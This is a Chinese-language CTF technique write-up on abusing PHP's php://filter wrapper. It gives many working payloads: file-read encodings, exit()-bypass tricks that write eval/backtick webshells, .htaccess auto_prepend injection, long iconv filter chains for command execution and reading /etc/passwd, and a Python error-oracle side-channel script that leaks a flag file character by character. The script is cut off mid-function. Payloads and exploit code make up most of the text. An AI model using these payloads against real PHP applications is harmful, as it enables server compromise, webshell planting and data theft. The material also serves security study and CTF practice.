关于php://filter过滤器

常规的php://filter过滤器：

<?php
//index.php
include($_REQUEST['file']);
?>

<?php
//flag.php
$flag='flag{test_flag}';
?>

 同过base64读取flag.php的类容：

 常用payload：

（这是最常用的payload）
php://filter/read=convert.base64-encode/resource=flag.php（其余）
php://filter/string.rot13/resource=flag.php
php://filter/convert.iconv.utf-8.utf-7/resource=flag.php
php://filter/convert.iconv.utf-8.utf-16/resource=flag.php
php://filter/convert.iconv.utf-8.utf-32/resource=flag.php
php://filter/convert.iconv.utf-8.ucs-2/resource=flag.php
php://filter/convert.iconv.utf-8.ucs-4/resource=flag.php
UTF-8
UCS-2, UCS-2BE, UCS-2LE
UCS-4, UCS-4BE, UCS-4LE
UTF-16, UTF-16BE, UTF-16LE
UTF-32, UTF-32BE, UTF-32LE
UTF-7
等等...（读取文件长度必须为偶数）
php://filter/convert.iconv.ucs-2LE.ucs-2BE/resource=flag.php
（读取文件长度必须为4的倍数）
php://filter/convert.iconv.ucs-4LE.ucs-4BE/resource=flag.php（把一些不可打印的ASCII字符转换为十六进制的形式）
php://filter/convert.quoted-printable-encode/resource=flag.php

通过filter死亡绕过exit()：

一般的3中形式：

https://xz.aliyun.com/t/8163

file_put_contents($filename , "<?php exit();".$content);file_put_contents($content,"<?php exit();".$content);file_put_contents($filename,$content."\nzangShuju");

第一种形式的file_put_contents 

1、base64编码绕过

<?php
$filename=$_GET['filename'];
$content=$_GET['content'];
file_put_contents($filename , "<?php exit();".$content);
?>

从代码可知，我们不论输入什么php的代码都会拼接到exit()后面，从而导致后面的任何语句都失效而无法执行。 而我们知道base64解码过程是按4个字符一起解码（对于不在base64编码类容里的那些特殊字符会自动忽略）。所有我们可以使用base64-decode来绕过。

比如我想插入的代码为<?php phpinfo()?>，经过base64编码后的类容为PD9waHAgcGhwaW5mbygpPz4=。

所有最终的payload就为：

?filename=php://filter/convert.base64-decode/resource=1.php&content=aPD9waHAgcGhwaW5mbygpPz4=其中在最前方加了一个a，因为phpexit为7个字符，为了满足4的倍数让base64正常解码，所有加了一个a。

 

成功写入 。

2、rot13编码绕过

我们都知道rot13其实就是位移13位的凯撒密码，如<?php phpinfo()?>经过rot13后变为<?cuc cucvasb()?>，所有我们可以利用这种性质来绕过exit()。

?filename=php://filter/string.rot13/resource=1.php&content=<?cuc cucvasb()?>

也是成功写入，能够运行。 

3、string.strip_tags绕过

string.strip_tags能过过滤掉html标签<>及类容：

?filename=php://filter/string.strip_tags|convert.base64-decode/resource=1.php&content=?>PD9waHAgcGhwaW5mbygpPz4=?>是为了闭合前面<，从而形成<>

注意：string.strip_tags过滤器只是可以在php5的环境下顺利的使用，如果题目环境是在php7.3.0以上的环境下，则会发生段错误。导致写不进去；根本来说是php7.3.0中废弃了string.strip_tags这个过滤器

4、.htaccess预包含绕过

如果对方服务是运行在apache上，而不是php直接启动web服务，就可以运用此方法。

filename=php://filter/write=string.strip_tags/resource=.htaccess&content=?>php_value auto_prepend_file flag.php

5、过滤器叠加绕过 

由于在php7等环境无法使用string.strip_tags过滤器，我们则可以考虑使用过滤器进行叠加，使本来的功能性代码被破坏。

三个过滤器叠加之后先进行压缩，然后转小写，最后解压，会导致部分死亡代码错误，将我们的木马写入filename=php://filter/zlib.deflate|string.tolower|zlib.inflate/resource=shell.php
content=php://filter/zlib.deflate|string.tolower|zlib.inflate?><?php%0a@eval($_POST['cmd']);?>其中%0a还可以用%0d，%09等字符替换。

 第二种形式的file_put_contents 

1、rot13绕过

<?php
$filename="php://filter/write=string.rot13|?><?cuc cucvasb();?>/resource=shell.php";
file_put_contents($filename , "<?php exit();".$filename);
?>

 php://filter/write=string.rot13|?><?cuc cucvasb();?>/resource=shell.php

<?cuc cucvasb();?>为<?php phpinfo();?>

 

2、iconv编码绕过

利用iconv编码绕过，可以将一种编码变为另一种编码模式，在php中，iconv用法为：

iconv ( string $in_charset , string $out_charset , string $str ) : string

1、usc-2（对目标字符串进行2位一反转，需要偶数位）

<?php
echo iconv('UCS-2LE','UCS-2BE','?><?php @eval($_POST["shellcmd"]);?>')."\n";
//>??<hp pe@av(l_$OPTS"[hslecldm]";)>?
$filename="php://filter/convert.iconv.UCS-2LE.UCS-2BE|>??<hp pe@av(l_\$OPTS\"[hslecldm]\";)>?/resource=shell.php";
file_put_contents($filename , "<?php exit();".$filename);
?>

payload：

php://filter/convert.iconv.UCS-2LE.UCS-2BE|>??<hp pe@av(l_$OPTS"[hslecldm]";)>?/resource=shell.php

2、usc-4（4位一反转，需要为4的倍数）

<?php
echo iconv('UCS-4LE','UCS-4BE','?><?php @eval($_POST["shellcmd"]);?>')."\n";
//?<>? phpave@_$(lTSOPhs"[clle]"dm>?;)
$filename="php://filter/convert.iconv.UCS-4LE.UCS-4BE|?<>? phpave@_$(lTSOPhs\"[clle]\"dm>?;)/resource=shellcmd.php";
file_put_contents($filename , "<?php exit();".$filename);
?>

 payload：

php://filter/convert.iconv.UCS-4LE.UCS-4BE|?<>? phpave@_$(lTSOPhs"[clle]"dm>?;)/resource=shellcmd.php

 注意：在使用usc-2和usc-4时切记他们的倍数关系，不然会保存失败。

3、base64编码 

<?php$filename="php://filter/convert.base64-decode/PD9waHAgZXZhbCgkX1BPU1RbInNoZWxsY21kIl0pOz8+/resource=shell.php";
file_put_contents($filename , "<?php exit();".$filename);
?>

如果直接按照这样编写，只会有文件名，但没有类容，因为在写入的内容中为：

<?php exit();php://filter/convert.base64-decode/PD9waHAgZXZhbCgkX1BPU1RbInNoZWxsY21kIl0pOz8+/resource=shell.php 

其中有一个等号，会发生报错，因为在base64中=表示结束的意思。

使用string.strip_tags过滤器，用其特性过滤掉html标签，即，我们可以把=包含在<>标签里过滤掉。

php://filter/string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbInNoZWxsY21kIl0pOz8+

但这样依旧有一个问题，就是保存的文件在服务器端会有一个''，导致游览器无法访问。

最终payload：php://filter/string.strip_tags|convert.base64-decode/resource=?>PD9waHAgZXZhbCgkX1BPU1RbInNoZWxsY21kIl0pOz8+/../cmd.php

这样就会把内容保存在cmd.php文件中。

4、utf-8和utf-7间的转换

<?php
//echo iconv('UTF-8','UTF-7','=').'\n';
//生成的是+AD0-，可以将=号对base64解码造成的影响解决，在‘=’的后面是不允许有任何其他字符的否则会报错.echo base64_encode('<?php @eval($_POST["shellcmd"]);?>')."\n";
//PD9waHAgQGV2YWwoJF9QT1NUWyJzaGVsbGNtZCJdKTs/Pg==
$filename="php://filter/write=PD9waHAgQGV2YWwoJF9QT1NUWyJzaGVsbGNtZCJdKTs/Pg==|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=shell.php";
file_put_contents($filename , "<?php exit();".$filename);echo iconv('UTF-8','UTF-7','<?php exit();php://filter/write=PD9waHAgQGV2YWwoJF9QT1NUWyJzaGVsbGNtZCJdKTs/Pg==|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=shell.php');
//+ADw?php exit()+ADs-php://filter/write+AD0-PD9waHAgQGV2YWwoJF9QT1NUWyJzaGVsbGNtZCJdKTs/Pg+AD0APQB8-convert.iconv.utf-8.utf-7+AHw-convert.base64-decode/resource+AD0-shell.php//其中+ADw?php exit()+ADs-php://filter/write+AD0-  刚好满足base64的倍数
?>

 payload：

php://filter/write=PD9waHAgQGV2YWwoJF9QT1NUWyJzaGVsbGNtZCJdKTs/Pg==|convert.iconv.utf-8.utf-7|convert.base64-decode/resource=shell.php

第三种形式的file_put_contents

对于这种情况，其实要写马的话很简单，如：

<?php
$filename='shell.php';
$content='<?php eval($_POST[1]);?>';
file_put_contents($filename,$content."\nzangShuju");

 但一般这样的题都会过滤掉php的起始符和结束符号，所有我们可以使用预包含（.htaccess）来进行绕过。

filter-chain：

原理自查，这里只做应用。

相关生成payload代码可以在github上找。

任意构造字符串

<?php
$poc = $_POST['poc'];
$result = file_get_contents("php://filter/$poc/resource=/etc/passwd");
if(preg_match('/^CTF_WEB/',$result)){echo "yes";
}

 convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode

任意命令执行

<?php include($_REQUEST['file']);

<?=`$_GET[0]`

 php://filter/convert.base64-encode|convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd

写马

<?php
$a = $_POST[1];
$contents = file_get_contents($a);
file_put_contents($a, $contents);

<?=`$_POST[1]`;?> 

php://filter/convert.base64-encode|convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP866.CSUNICODE|convert.iconv.CSISOLATIN5.ISO_6937-2|convert.iconv.CP950.UTF-16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500.L4|convert.iconv.ISO_8859-2.ISO-IR-103|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM860.UTF16|convert.iconv.ISO-IR-143.ISO2022CNEXT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CN.ISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UTF16|convert.iconv.L6.UTF-16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=index.php 

filter侧信道攻击：

<?php file($_POST[0]);

import requests
import sys
from base64 import b64decode"""
THE GRAND IDEA:
We can use PHP memory limit as an error oracle. Repeatedly applying the convert.iconv.L1.UCS-4LE
filter will blow up the string length by 4x every time it is used, which will quickly cause
500 error if and only if the string is non empty. So we now have an oracle that tells us if
the string is empty.THE GRAND IDEA 2:
The dechunk filter is interesting.
https://github.com/php/php-src/blob/01b3fc03c30c6cb85038250bb5640be3a09c6a32/ext/standard/filters.c#L1724
It looks like it was implemented for something http related, but for our purposes, the interesting
behavior is that if the string contains no newlines, it will wipe the entire string if and only if
the string starts with A-Fa-f0-9, otherwise it will leave it untouched. This works perfect with our
above oracle! In fact we can verify that since the flag starts with D that the filter chaindechunk|convert.iconv.L1.UCS-4LE|convert.iconv.L1.UCS-4LE|[...]|convert.iconv.L1.UCS-4LEdoes not cause a 500 error.THE REST:
So now we can verify if the first character is in A-Fa-f0-9. The rest of the challenge is a descent
into madness trying to figure out ways to:
- somehow get other characters not at the start of the flag file to the front
- detect more precisely which character is at the front
"""def join(*x):return '|'.join(x)def err(s):print(s)raise ValueErrordef req(s):data = {'0': f'php://filter/{s}/resource=/flag'}return requests.post('http://localhost:5000/index.php', data=data).status_code == 500"""
Step 1:
The second step of our exploit only works under two conditions:
- String only contains a-zA-Z0-9
- String ends with two equals signsbase64-encoding the flag file twice takes care of the first condition.We don't know the length of the flag file, so we can't be sure that it will end with two equals
signs.Repeated application of the convert.quoted-printable-encode will only consume additional
memory if the base64 ends with equals signs, so that's what we are going to use as an oracle here.
If the double-base64 does not end with two equals signs, we will add junk data to the start of the
flag with convert.iconv..CSISO2022KR until it does.
"""blow_up_enc = join(*['convert.quoted-printable-encode']*1000)
blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'
blow_up_inf = join(*[blow_up_utf32]*50)header = 'convert.base64-encode|convert.base64-encode'# Start get baseline blowup
print('Calculating blowup')
baseline_blowup = 0
for n in range(100):payload = join(*[blow_up_utf32]*n)if req(f'{header}|{payload}'):baseline_blowup = nbreak
else:err('something wrong')print(f'baseline blowup is {baseline_blowup}')trailer = join(*[blow_up_utf32]*(baseline_blowup-1))assert req(f'{header}|{trailer}') == Falseprint('detecting equals')
j = [req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')
]
print(j)
if sum(j) != 2:err('something wrong')
if j[0] == False:header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'
elif j[1] == False:header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'
elif j[2] == False:header = f'convert.base64-encode|convert.base64-encode'
else:err('something wrong')
print(f'j: {j}')
print(f'header: {header}')"""
Step two:
Now we have something of the form
[a-zA-Z0-9 things]==Here the pain begins. For a long time I was trying to find something that would allow me to strip
successive characters from the start of the string to access every character. Maybe something like
that exists but I couldn't find it. However, if you play around with filter combinations you notice
there are filters that *swap* characters:convert.iconv.CSUNICODE.UCS-2BE, which I call r2, flips every pair of characters in a string:
abcdefgh -> badcfehgconvert.iconv.UCS-4LE.10646-1:1993, which I call r4, reverses every chunk of four characters:
abcdefgh -> dcbahgfeThis allows us to access the first four characters of the string. Can we do better? It turns out
YES, we can! Turns out that convert.iconv.CSUNICODE.CSUNICODE appends <0xff><0xfe> to the start of
the string:abcdefgh -> <0xff><0xfe>abcdefghThe idea being that if we now use the r4 gadget, we get something like:
ba<0xfe><0xff>fedcAnd then if we apply a convert.base64-decode|convert.base64-encode, it removes the invalid
<0xfe><0xff> to get:
bafedcAnd then apply the r4 again, we have swapped the f and e to the front, which were the 5th and 6th
characters of the string. There's only one problem: our r4 gadget requires that the string length
is a multiple of 4. The original base64 string will be a multiple of four by definition, so when
we apply convert.iconv.CSUNICODE.CSUNICODE it will be two more than a multiple of four, which is no
good for our r4 gadget. This is where the double equals we required in step 1 comes in! Because it
turns out, if we apply the filter
convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7It will turn the == into:
+---AD0-3D3D+---AD0-3D3DAnd this is magic, because this corrects such that when we apply the
convert.iconv.CSUNICODE.CSUNICODE filter the resuting string is exactly a multiple of four!Let's recap. We have a string like:
abcdefghij==Apply the convert.quoted-printable-encode + convert.iconv.L1.utf7:
abcdefghij+---AD0-3D3D+---AD0-3D3DApply convert.iconv.CSUNICODE.CSUNICODE:
<0xff><0xfe>abcdefghij+---AD0-3D3D+---AD0-3D3DApply r4 gadget:
ba<0xfe><0xff>fedcjihg---+-0DAD3D3---+-0DAD3D3Apply base64-decode | base64-encode, so the '-' and high bytes will disappear:
bafedcjihg+0DAD3D3+0DAD3Dw==Then apply r4 once more:
efabijcd0+gh3DAD0+3D3DAD==wDAnd here's the cute part: not only have we now accessed the 5th and 6th chars of the string, but
the string still has two equals signs in it, so we can reapply the technique as many times as we
want, to access all the characters in the string ;)
"""flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"
r2 = "convert.iconv.CSUNICODE.UCS-2BE"
r4 = "convert.iconv.UCS-4LE.10646-1:1993"def get_nth(n):global flip, r2, r4o = []chunk = n // 2if chunk % 2 == 1: o.append(r4)o.extend([flip, r4] * (chunk // 2))if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)return join(*o)"""
Step 3:
This is the longest but actually easiest part. We can use dechunk oracle to figure out if the first
char is 0-9A-Fa-f. So it's just a matter of finding filters which translate to or from those
chars. rot13 and string lower are helpful. There are probably a million ways to do this bit but
I just bruteforced every combination of iconv filters to find these.Numbers are a bit trickier because iconv doesn't tend to touch them.
In the CTF you coud porbably just guess from there once you have the letters. But if you actually 
want a full leak you can base64 encode a third time and use the first two letters of the resulting
string to figure out which number it is.
"""rot1 = 'convert.iconv.437.CP930'
be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'
o = ''def find_letter(prefix):if not req(f'{prefix}|dechunk|{blow_up_inf}'):# a-f A-F 0-9if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):# a-efor n in range(5):if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):return 'edcba'[n]breakelse:err('something wrong')elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):# A-Efor n in range(5):if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):return 'EDCBA'[n]breakelse:err('something wrong')elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):return '*'elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# freturn 'f'elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# Freturn 'F'else:err('something wrong')elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):# n-s N-Sif not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):# n-rfor n in range(5):if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):return 'rqpon'[n]breakelse:err('something wrong')elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):# N-Rfor n in range(5):if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):return 'RQPON'[n]breakelse:err('something wrong')elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# sreturn 's'elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):# Sreturn 'S'else:err('something wrong')elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):# i j kif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'k'elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'j'elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'i'else:err('something wrong')elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):# I J Kif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'K'elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'J'elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'I'else:err('something wrong')elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):# v w xif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'x'elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'w'elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'v'else:err('something wrong')elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):# V W Xif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'X'elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'W'elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):return 'V'else:err('something wrong')elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):# Zreturn 'Z'elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):# zreturn 'z'elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):# Mreturn 'M'elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):# mreturn 'm'elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):# yreturn 'y'elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):# Yreturn 'Y'elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):# lreturn 'l'elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):# Lreturn 'L'elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):# hreturn 'h'elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):# Hreturn 'H'elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):# ureturn 'u'elif not 